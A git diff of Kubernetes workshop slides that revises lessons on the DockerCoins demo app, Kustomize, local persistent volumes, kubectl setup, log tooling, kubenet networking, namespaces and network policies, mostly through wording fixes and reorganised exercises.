||||
|
||||
(but we can use it for debugging, troubleshooting, etc.)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into `node1`
|
||||
|
||||
- Check that all nodes are `Ready`:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cloning some repos
|
||||
|
||||
- We will need two repositories:
|
||||
|
||||
- the first one has the "DockerCoins" demo app
|
||||
|
||||
- the second one has these slides, some scripts, more manifests ...
|
||||
|
||||
.exercise[
|
||||
|
||||
- Clone the kubercoins repository on `node1`:
|
||||
```bash
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
|
||||
- Clone the container.training repository as well:
|
||||
```bash
|
||||
git clone https://@@GITREPO@@
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Running the application
|
||||
|
||||
Without further ado, let's start this application!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply all the manifests from the kubercoins repository:
|
||||
```bash
|
||||
kubectl apply -f kubercoins/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
--
|
||||
|
||||
- It is a DockerCoin miner! .emoji[💰🐳📦🚢]
|
||||
|
||||
--
|
||||
|
||||
- No, you can't buy coffee with DockerCoins
|
||||
|
||||
--
|
||||
|
||||
- How DockerCoins works:
|
||||
|
||||
- generate a few random bytes
|
||||
|
||||
- hash these bytes
|
||||
|
||||
- increment a counter (to keep track of speed)
|
||||
|
||||
- repeat forever!
|
||||
|
||||
--
|
||||
|
||||
- DockerCoins is *not* a cryptocurrency
|
||||
|
||||
(the only common points are "randomness", "hashing", and "coins" in the name)
|
||||
|
||||
---
|
||||
|
||||
## DockerCoins in the microservices era
|
||||
|
||||
- DockerCoins is made of 5 services:
|
||||
|
||||
- `rng` = web service generating random bytes
|
||||
|
||||
- `hasher` = web service computing hash of POSTed data
|
||||
|
||||
- `worker` = background process calling `rng` and `hasher`
|
||||
|
||||
- `webui` = web interface to watch progress
|
||||
|
||||
- `redis` = data store (holds a counter updated by `worker`)
|
||||
|
||||
- These 5 services are visible in the application's Compose file,
|
||||
[docker-compose.yml](
|
||||
https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml)
|
||||
|
||||
---
|
||||
|
||||
## How DockerCoins works
|
||||
|
||||
- `worker` invokes web service `rng` to generate random bytes
|
||||
|
||||
- `worker` invokes web service `hasher` to hash these bytes
|
||||
|
||||
- `worker` does this in an infinite loop
|
||||
|
||||
- every second, `worker` updates `redis` to indicate how many loops were done
|
||||
|
||||
- `webui` queries `redis`, and computes and exposes "hashing speed" in our browser
|
||||
|
||||
*(See diagram on next slide!)*
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Service discovery in container-land
|
||||
|
||||
How does each service find out the address of the other ones?
|
||||
|
||||
--
|
||||
|
||||
- We do not hard-code IP addresses in the code
|
||||
|
||||
- We do not hard-code FQDNs in the code, either
|
||||
|
||||
- We just connect to a service name, and container-magic does the rest
|
||||
|
||||
(And by container-magic, we mean "a crafty, dynamic, embedded DNS server")
|
||||
|
||||
---
|
||||
|
||||
## Example in `worker/worker.py`
|
||||
|
||||
```python
|
||||
redis = Redis("`redis`")
|
||||
|
||||
|
||||
def get_random_bytes():
|
||||
r = requests.get("http://`rng`/32")
|
||||
return r.content
|
||||
|
||||
|
||||
def hash_bytes(data):
|
||||
r = requests.post("http://`hasher`/",
|
||||
data=data,
|
||||
headers={"Content-Type": "application/octet-stream"})
|
||||
```
|
||||
|
||||
(Full source code available [here](
|
||||
https://@@GITREPO@@/blob/8279a3bce9398f7c1a53bdd95187c53eda4e6435/dockercoins/worker/worker.py#L17
|
||||
))
|
||||
|
||||
---
|
||||
|
||||
## Show me the code!
|
||||
|
||||
- You can check the GitHub repository with all the materials of this workshop:
|
||||
<br/>https://@@GITREPO@@
|
||||
|
||||
- The application is in the [dockercoins](
|
||||
https://@@GITREPO@@/tree/master/dockercoins)
|
||||
subdirectory
|
||||
|
||||
- The Compose file ([docker-compose.yml](
|
||||
https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml))
|
||||
lists all 5 services
|
||||
|
||||
- `redis` is using an official image from the Docker Hub
|
||||
|
||||
- `hasher`, `rng`, `worker`, `webui` are each built from a Dockerfile
|
||||
|
||||
- Each service's Dockerfile and source code is in its own directory
|
||||
|
||||
(`hasher` is in the [hasher](https://@@GITREPO@@/blob/master/dockercoins/hasher/) directory,
|
||||
`rng` is in the [rng](https://@@GITREPO@@/blob/master/dockercoins/rng/)
|
||||
directory, etc.)
|
||||
|
||||
---
|
||||
|
||||
## Our application at work
|
||||
|
||||
- We can check the logs of our application's pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of the various components:
|
||||
```bash
|
||||
kubectl logs deploy/worker
|
||||
kubectl logs deploy/hasher
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to the web UI
|
||||
|
||||
- "Logs are exciting and fun!" (No-one, ever)
|
||||
|
||||
- The `webui` container exposes a web dashboard; let's view it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the NodePort allocated to the web UI:
|
||||
```bash
|
||||
kubectl get svc webui
|
||||
```
|
||||
|
||||
- Open that in a web browser
|
||||
|
||||
]
|
||||
|
||||
A drawing area should show up, and after a few seconds, a blue
|
||||
graph will appear.
|
||||
@@ -14,15 +14,15 @@
|
||||
|
||||
## Differences with Helm
|
||||
|
||||
- Helm Charts use placeholders `{{ like.this }}`
|
||||
- Helm charts use placeholders `{{ like.this }}`
|
||||
|
||||
- Kustomize "bases" are standard Kubernetes YAML
|
||||
|
||||
- It is possible to use an existing set of YAML as a Kustomize base
|
||||
|
||||
- As a result, writing a Helm Chart is more work ...
|
||||
- As a result, writing a Helm chart is more work ...
|
||||
|
||||
- ... But Helm Charts are also more powerful; e.g. they can:
|
||||
- ... But Helm charts are also more powerful; e.g. they can:
|
||||
|
||||
- use flags to conditionally include resources or blocks
|
||||
|
||||
@@ -70,7 +70,7 @@
|
||||
|
||||
- We need to run `ship init` in a new directory
|
||||
|
||||
- `ship init` requires an URL to a remote repository containing Kubernetes YAML
|
||||
- `ship init` requires a URL to a remote repository containing Kubernetes YAML
|
||||
|
||||
- It will clone that repository and start a web UI
|
||||
|
||||
@@ -88,11 +88,11 @@
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kubercoins
|
||||
cd ~/kubercoins
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kubercoins repository:
|
||||
- Run `ship init` with the kustomcoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
@@ -146,3 +146,49 @@
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -48,7 +48,7 @@
|
||||
|
||||
- Acknowledge that a lot of tasks are outsourced
|
||||
|
||||
(e.g. if we add "buy / rack / provision machines" in that list)
|
||||
(e.g. if we add "buy/rack/provision machines" in that list)
|
||||
|
||||
---
|
||||
|
||||
@@ -120,9 +120,9 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
✔️ parity between dev and prod environments
|
||||
|
||||
@@ -150,7 +150,7 @@
|
||||
|
||||
- do we reward on-call duty without encouraging hero syndrome?
|
||||
|
||||
- do we give resources (time, money) to people to learn?
|
||||
- do we give people resources (time, money) to learn?
|
||||
|
||||
---
|
||||
|
||||
@@ -183,9 +183,9 @@ are a few tools that can help us.*
|
||||
|
||||
- If cloud: public vs. private
|
||||
|
||||
- Which vendor / distribution to pick?
|
||||
- Which vendor/distribution to pick?
|
||||
|
||||
- Which versions / features to enable?
|
||||
- Which versions/features to enable?
|
||||
|
||||
---
|
||||
|
||||
@@ -205,6 +205,6 @@ are a few tools that can help us.*
|
||||
|
||||
- Transfer knowledge
|
||||
|
||||
(make sure everyone is on the same page / same level)
|
||||
(make sure everyone is on the same page/level)
|
||||
|
||||
- Iterate!
|
||||
|
||||
268
slides/k8s/local-persistent-volumes.md
Normal file
268
slides/k8s/local-persistent-volumes.md
Normal file
@@ -0,0 +1,268 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹, until we will create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## If we have a dynamic provisioner ...
|
||||
|
||||
- The labs in this section assume that we *do not* have a dynamic provisioner
|
||||
|
||||
- If we do have one, we need to disable it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check if we have a dynamic provisioner:
|
||||
```bash
|
||||
kubectl get storageclass
|
||||
```
|
||||
|
||||
- If the output contains a line with `(default)`, run this command:
|
||||
```bash
|
||||
kubectl annotate sc storageclass.kubernetes.io/is-default-class- --all
|
||||
```
|
||||
|
||||
- Check again that it is no longer marked as `(default)`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`: it is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplate` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance EBS are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backend by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul clusters has 3 members indeed:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)
|
||||
|
||||
- This specific example worked because we had exactly 1 free PV per node:
|
||||
|
||||
- if we had created multiple PVs per node ...
|
||||
|
||||
- we could have ended with two PVCs bound to PVs on the same node ...
|
||||
|
||||
- which would have required two pods to be on the same node ...
|
||||
|
||||
- which is forbidden by the anti-affinity constraints in the StatefulSet
|
||||
|
||||
- To avoid that, we need to associated the PVs with a Storage Class that has:
|
||||
```yaml
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
```
|
||||
(this means that a PVC will be bound to a PV only after being used by a Pod)
|
||||
|
||||
- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
|
||||
|
||||
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for large number of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -57,17 +75,24 @@ Platform:"linux/amd64"}
|
||||
|
||||
---
|
||||
|
||||
## Moving away the existing `~/.kube/config`
|
||||
## Preserving the existing `~/.kube/config`
|
||||
|
||||
- If you already have a `~/.kube/config` file, move it away
|
||||
- If you already have a `~/.kube/config` file, rename it
|
||||
|
||||
(we are going to overwrite it in the following slides!)
|
||||
|
||||
- If you never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -167,4 +192,4 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
We can now utilize the cluster exactly as we did before, ignoring that it's remote.
|
||||
We can now utilize the cluster exactly as we did before, except that it's remote.
|
||||
|
||||
@@ -73,12 +73,12 @@ and a few roles and role bindings (to give fluentd the required permissions).
|
||||
|
||||
- Fluentd runs on each node (thanks to a daemon set)
|
||||
|
||||
- It binds-mounts `/var/log/containers` from the host (to access these files)
|
||||
- It bind-mounts `/var/log/containers` from the host (to access these files)
|
||||
|
||||
- It continuously scans this directory for new files; reads them; parses them
|
||||
|
||||
- Each log line becomes a JSON object, fully annotated with extra information:
|
||||
<br/>container id, pod name, Kubernetes labels ...
|
||||
<br/>container id, pod name, Kubernetes labels...
|
||||
|
||||
- These JSON objects are stored in ElasticSearch
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Accessing logs from the CLI
|
||||
|
||||
- The `kubectl logs` commands has limitations:
|
||||
- The `kubectl logs` command has limitations:
|
||||
|
||||
- it cannot stream logs from multiple pods at a time
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
## Doing it manually
|
||||
|
||||
- We *could* (if we were so inclined), write a program or script that would:
|
||||
- We *could* (if we were so inclined) write a program or script that would:
|
||||
|
||||
- take a selector as an argument
|
||||
|
||||
@@ -72,11 +72,11 @@ Exactly what we need!
|
||||
|
||||
## Using Stern
|
||||
|
||||
- There are two ways to specify the pods for which we want to see the logs:
|
||||
- There are two ways to specify the pods whose logs we want to see:
|
||||
|
||||
- `-l` followed by a selector expression (like with many `kubectl` commands)
|
||||
|
||||
- with a "pod query", i.e. a regex used to match pod names
|
||||
- with a "pod query," i.e. a regex used to match pod names
|
||||
|
||||
- These two ways can be combined if necessary
|
||||
|
||||
|
||||
@@ -96,7 +96,7 @@ class: extra-details
|
||||
|
||||
- We need to generate a `kubeconfig` file for kubelet
|
||||
|
||||
- This time, we need to put the IP address of `kubenet1`
|
||||
- This time, we need to put the public IP address of `kubenet1`
|
||||
|
||||
(instead of `localhost` or `127.0.0.1`)
|
||||
|
||||
@@ -104,12 +104,10 @@ class: extra-details
|
||||
|
||||
- Generate the `kubeconfig` file:
|
||||
```bash
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
kubectl config set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context kubenet --cluster kubenet
|
||||
kubectl config use-context kubenet
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
```
|
||||
|
||||
]
|
||||
@@ -197,7 +195,7 @@ class: extra-details
|
||||
|
||||
## Check our pods
|
||||
|
||||
- The pods will be scheduled to the nodes
|
||||
- The pods will be scheduled on the nodes
|
||||
|
||||
- The nodes will pull the `nginx` image, and start the pods
|
||||
|
||||
@@ -327,7 +325,7 @@ class: extra-details
|
||||
|
||||
- We will add the `--network-plugin` and `--pod-cidr` flags
|
||||
|
||||
- We all have a "cluster number" (let's call that `C`)
|
||||
- We all have a "cluster number" (let's call that `C`) printed on your VM info card
|
||||
|
||||
- We will use pod CIDR `10.C.N.0/24` (where `N` is the node number: 1, 2, 3)
|
||||
|
||||
@@ -482,6 +480,23 @@ Sometimes it works, sometimes it doesn't. Why?
|
||||
```bash
|
||||
kubectl get nodes -o wide
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Firewalling
|
||||
|
||||
- By default, Docker prevents containers from using arbitrary IP addresses
|
||||
|
||||
(by setting up iptables rules)
|
||||
|
||||
- We need to allow our containers to use our pod CIDR
|
||||
|
||||
- For simplicity, we will insert a blanket iptables rule allowing all traffic:
|
||||
|
||||
`iptables -I FORWARD -j ACCEPT`
|
||||
|
||||
- This has to be done on every node
|
||||
|
||||
---
|
||||
|
||||
## Setting up routing
|
||||
@@ -490,6 +505,8 @@ Sometimes it works, sometimes it doesn't. Why?
|
||||
|
||||
- Create all the routes on all the nodes
|
||||
|
||||
- Insert the iptables rule allowing traffic
|
||||
|
||||
- Check that you can ping all the pods from one of the nodes
|
||||
|
||||
- Check that you can `curl` the ClusterIP of the Service successfully
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There has to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have an `rng` service, an `rng` deployment, and an `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -42,12 +81,16 @@
|
||||
|
||||
## Creating namespaces
|
||||
|
||||
- Creating a namespace is done with the `kubectl create namespace` command:
|
||||
- Let's see two identical methods to create a namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- We can use `kubectl create namespace`:
|
||||
```bash
|
||||
kubectl create namespace blue
|
||||
```
|
||||
|
||||
- We can also get fancy and use a very minimal YAML snippet, e.g.:
|
||||
- Or we can construct a very minimal YAML snippet:
|
||||
```bash
|
||||
kubectl apply -f- <<EOF
|
||||
apiVersion: v1
|
||||
@@ -57,9 +100,9 @@
|
||||
EOF
|
||||
```
|
||||
|
||||
- The two methods above are identical
|
||||
]
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -168,41 +211,28 @@
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Helm
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
*Follow these instructions if you previously created a Helm Chart.*
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
cd ~
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument behind `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
*Follow these instructions if you previously created a Kustomize overlay.*
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
]
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
@@ -221,46 +251,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If did the exercices from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -307,7 +307,7 @@ This policy selects all pods in the current namespace.
|
||||
|
||||
It allows traffic only from pods in the current namespace.
|
||||
|
||||
(An empty `podSelector` means "all pods".)
|
||||
(An empty `podSelector` means "all pods.")
|
||||
|
||||
```yaml
|
||||
kind: NetworkPolicy
|
||||
@@ -329,7 +329,7 @@ This policy selects all pods with label `app=webui`.
|
||||
|
||||
It allows traffic from any source.
|
||||
|
||||
(An empty `from` fields means "all sources".)
|
||||
(An empty `from` field means "all sources.")
|
||||
|
||||
```yaml
|
||||
kind: NetworkPolicy
|
||||
@@ -412,7 +412,7 @@ troubleshoot easily, without having to poke holes in our firewall.
|
||||
|
||||
- If we block access to the control plane, we might disrupt legitimate code
|
||||
|
||||
- ... Without necessarily improving security
|
||||
- ...Without necessarily improving security
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
